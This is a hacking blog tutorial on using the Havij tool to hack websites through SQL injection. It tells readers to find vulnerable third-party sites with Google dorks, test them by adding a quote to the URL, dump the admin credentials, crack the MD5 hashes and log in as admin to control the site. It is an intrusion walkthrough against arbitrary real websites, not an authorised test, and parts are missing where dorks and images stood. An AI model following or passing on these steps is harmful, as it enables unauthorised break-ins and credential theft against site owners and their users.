If you have your own ideas plz write it as comment to this post. Your participation is always appreciated. Good Luck !



SQL Injection Using Havij [Hack A Website]

  • SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.
    SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.
    In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
  • You can download havij from here.
  • We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:
  • Just search google using one of the dork and you will see a lot of vulnerable websites.
  • Open any one of the website than put  after the link look:
  • If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.
  • Now open Havij and paste the link without ‘
  • Now we have to find the columns of the database.
  • After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on Cracking MD5.
  • After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.
  • Now you may login as the admin user and control the website as you want.
  • H@ppy H@cking
Video Tutorial